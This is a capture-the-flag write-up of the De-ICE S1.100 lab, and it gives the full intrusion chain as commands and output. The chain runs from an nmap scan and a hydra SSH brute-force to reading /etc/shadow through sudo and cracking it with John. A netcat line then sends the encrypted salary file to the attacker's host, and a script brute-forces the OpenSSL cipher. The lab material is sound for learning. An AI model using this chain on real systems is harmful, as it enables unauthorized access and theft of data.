published on in writeup
tags: de-ice

De-ICE S1.100

This is a walkthrough of how I completed the De-ICE S1.100 challenge. The end goal is to obtain the CEO’s salary information.

Nmap

[email protected]:~# nmap -n -sV -A -p- 192.168.1.100
 
PORT    STATE  SERVICE  VERSION
20/tcp  closed ftp-data
21/tcp  open   ftp      vsftpd (broken: could not bind listening IPv4 socket)
22/tcp  open   ssh      OpenSSH 4.3 (protocol 1.99)
|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
|_sshv1: Server supports SSHv1
25/tcp  open   smtp     Sendmail 8.13.7/8.13.7
| smtp-commands: slax.example.net Hello [192.168.1.200], pleased to meet you, ENHANCEDSTATUSCODES, PIPELINING, 8BITMIME, SIZE, DSN, ETRN, AUTH DIGEST-MD5 CRAM-MD5, DELIVERBY, HELP,
|_ 2.0.0 This is sendmail version 8.13.7 2.0.0 Topics: 2.0.0 HELO EHLO MAIL RCPT DATA 2.0.0 RSET NOOP QUIT HELP VRFY 2.0.0 EXPN VERB ETRN DSN AUTH 2.0.0 STARTTLS 2.0.0 For more info use "HELP <topic>". 2.0.0 To report bugs in the implementation see 2.0.0 http://www.sendmail.org/email-addresses.html 2.0.0 For local information send email to Postmaster at your site. 2.0.0 End of HELP info
80/tcp  open   http     Apache httpd 2.0.55 ((Unix) PHP/5.1.2)
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Site doesn't have a title (text/html).
110/tcp open   pop3     Openwall popa3d
143/tcp open   imap     UW imapd 2004.357
|_imap-capabilities: CAPABILITY IDLE LOGIN-REFERRALS LITERAL+ THREAD=ORDEREDSUBJECT THREAD=REFERENCES SCAN MAILBOX-REFERRALS SORT NAMESPACE STARTTLS completed IMAP4REV1 OK AUTH=LOGINA0001 UNSELECT SASL-IR BINARY MULTIAPPEND
443/tcp closed https

If you open up a web browser and go to 192.168.1.100, you will see a generic welcome page to the De-ICE challenge, with a link to see some hints if you get stuck. To see the game related page, click the link at the bottom of the page and it will take you to 192.168.1.100/index2.php.

This page contains some names and email addresses of employee’s. I took a copy of this information, and used it to create a list of possible usernames.

Hydra

I then attempted to use these usernames to bruteforce the SSH login.

[email protected]:~/de-ice/1.100# hydra -L users -e nsr 192.168.1.100 ssh
1 of 1 target completed, 0 valid passwords found

The nsr option checks for null password, login as password and reverse login as password. Unfortunately, none of these attempts were successful. Before attempting to use a large dictionary, I decided to look again at my list of users. On a hunch, I swapped the surname and first initials around, so instead of marym I had mmary etc.

I ran this through hydra again, but this time I got a successful hit.

[22][ssh] host: 192.168.1.100   login: bbanter   password: bbanter
1 of 1 target successfully completed, 1 valid password found

SSH & Enumeration

[email protected]:~/de-ice/1.100# ssh [email protected]
bbanter @ 192.168.1.100's password: 
Linux 2.6.16.
[email protected]:~$ 

This version of Linux is running an old kernel, and is therefore likely to have privilege escalation exploits available. However there is no gcc or python installed, which would make compiling and executing such exploits difficult.

The passwd and group files yielded some interesting information.

[email protected]:~$ cat /etc/passwd 
root:x:0:0:DO NOT CHANGE PASSWORD - WILL BREAK FTP ENCRYPTION:/root:/bin/bash
aadams:x:1000:10:,,,:/home/aadams:/bin/bash
bbanter:x:1001:100:,,,:/home/bbanter:/bin/bash
ccoffee:x:1002:100:,,,:/home/ccoffee:/bin/bash

This confirmed that these were the only three users on the system, so I went back and removed the others from my user list.

[email protected]:~$ cat /etc/group 
root::0:root
wheel::10:root
users::100:

Now I knew that bbanter and ccoffee were both members of the users (gid=100) group; and aadams was in the wheel (gid=10) group. The wheel group traditionally allows its users sudo privileges and would therefore be a better account to attack compared to ccoffee.

Hyrda (again)

[email protected]:~# hydra -l aadams -P /usr/share/wordlists/passwords 192.168.1.100 ssh

The password file I used was based on the darkc0de wordlist. To save time, I did some manipulation on it to remove all lines that contained numbers and special characters. It was a gamble that the password wouldn’t be too complicated. It seems I got lucky.

[22][ssh] host: 192.168.1.100 login: aadams password: nostradamus

SSH (again)

Since I was still logged in as bbanter, I used su to switch to aadams.

[email protected]:~$ su aadams
Password: ***********
[email protected]:/home/bbanter$ id
uid=1000(aadams) gid=10(wheel) groups=10(wheel)

My next step was to check the sudo rights of aadams.

[email protected]:~$ sudo -l
User aadams may run the following commands on this host:
    (root) NOEXEC: /bin/ls
    (root) NOEXEC: /usr/bin/cat
    (root) NOEXEC: /usr/bin/more
    (root) NOEXEC: !/usr/bin/su \*root\*

This made it a rather trivial exercise to obtain the shadow file.

[email protected]:~$ sudo cat /etc/shadow
root:$1$TOi0HE5n$j3obHaAlUdMbHQnJ4Y5Dq0:13553:0:::::
aadams:$1$6cP/ya8m$2CNF8mE.ONyQipxlwjp8P1:13550:0:99999:7:::
bbanter:$1$hl312g8m$Cf9v9OoRN062STzYiWDTh1:13550:0:99999:7:::
ccoffee:$1$nsHnABm3$OHraCR9ro.idCMtEiFPPA.:13550:0:99999:7:::

John the Ripper

I copied these hashes to my machine and set john to work on cracking them (excluding bbanter and aadams, I kept ccoffee in there for the sake of completeness).

[email protected]:~/de-ice/1.100# john --rules --wordlist=/usr/share/wordlists/darkc0de.lst shadow
tarot            (root)

Whilst john was working on these hashes, I used aadams’ sudo ls rights to browse the file system and eventually came across /home/ftp/incoming/salary_dec2003.csv.enc. I was able to sudo cat the file, which appeared to be in binary, but it could be piped to strings and more, to make some parts of it readable.

[email protected]:~$ sudo cat /home/ftp/incoming/salary_dec2003.csv.enc | strings | more

A little research into the string Salted__, revealed this was a file encrypted using OpenSSL.

OpenSSL

There are lots of options within OpenSSL for encrypting files, different ciphers etc. To this end, I wrote a script that would attempt each cipher on the encrypted file - not forgetting the little clue in the passwd file: “DO NOT CHANGE PASSWORD - WILL BREAK FTP ENCRYPTION”. This indicated to me that the root password was used during the encryption and that it would be required for the decryption (good job john was able to crack the hash for root).

To make this task a bit easier, I wanted to transfer the file to my Kali machine. There is a (broken) FTP service running, but instead of spending time fixing that to transfer the file, I used netcat instead.

[email protected]:~/de-ice/1.100# nc -lnvvp 4444 > salary_dec2003.csv.enc

Switch to the root user, and…

[email protected]:~$ su -
Password: *****

[email protected]:~# cd /home/ftp/incoming/
[email protected]:/home/ftp/incoming# nc 192.168.1.200 4444 < salary_dec2003.csv.enc 
#!/bin/bash
openssl=/usr/bin/openssl
ciphers=$($openssl list-cipher-commands)
key=tarot
in=salary_dec2003.csv.enc
out=salary_dec2003.csv
for i in $ciphers; do
        $openssl enc -d -${i} -in ${in} -k ${key} > /dev/null 2>&1;
                if [[ $? == 0 ]]; then
                $openssl enc -d -${i} -in ${in} -k ${key} -out ${out}
                echo "Successfully decrypted with ${i} and ${key}"
                exit 0; fi  
done
,1,Charles E. Ophenia,"$225,000.00",1,4,2.30%,28.00%,6.30%,1.45%,38.05%,$360.00,$500.00,$860.00,183200299,1123245
,2,Marie Mary,"$56,000.00",1,2,2.30%,28.00%,6.30%,1.45%,38.05%,$125.00,$100.00,$225.00,183200299,1192291
,3,Pat Patrick,"$43,350.00",1,1,2.30%,28.00%,6.30%,1.45%,38.05%,$125.00,$0.00,$125.00,183200299,2334432
,4,Terry Thompson,"$27,500.00",1,4,2.30%,28.00%,6.30%,1.45%,38.05%,$125.00,$225.00,$350.00,183200299,1278235
,5,Ben Benedict,"$29,750.00",1,3,2.30%,28.00%,6.30%,1.45%,38.05%,$125.00,$122.50,$247.50,183200299,2332546
,6,Erin Gennieg,"$105,000.00",1,4,2.30%,28.00%,6.30%,1.45%,38.05%,$125.00,$0.00,$125.00,183200299,1456567
,7,Paul Michael,"$76,000.00",1,2,2.30%,28.00%,6.30%,1.45%,38.05%,$125.00,$100.00,$225.00,183200299,1446756
,8,Ester Long,"$92,500.00",1,2,2.30%,28.00%,6.30%,1.45%,38.05%,$125.00,$0.00,$125.00,183200299,1776782
,9,Adam Adams,"$76,250.00",1,5,2.30%,28.00%,6.30%,1.45%,38.05%,$125.00,$0.00,$125.00,183200299,2250900
,10,Chad Coffee,"$55,000.00",1,1,2.30%,28.00%,6.30%,1.45%,38.05%,$125.00,$0.00,$125.00,183200299,1590264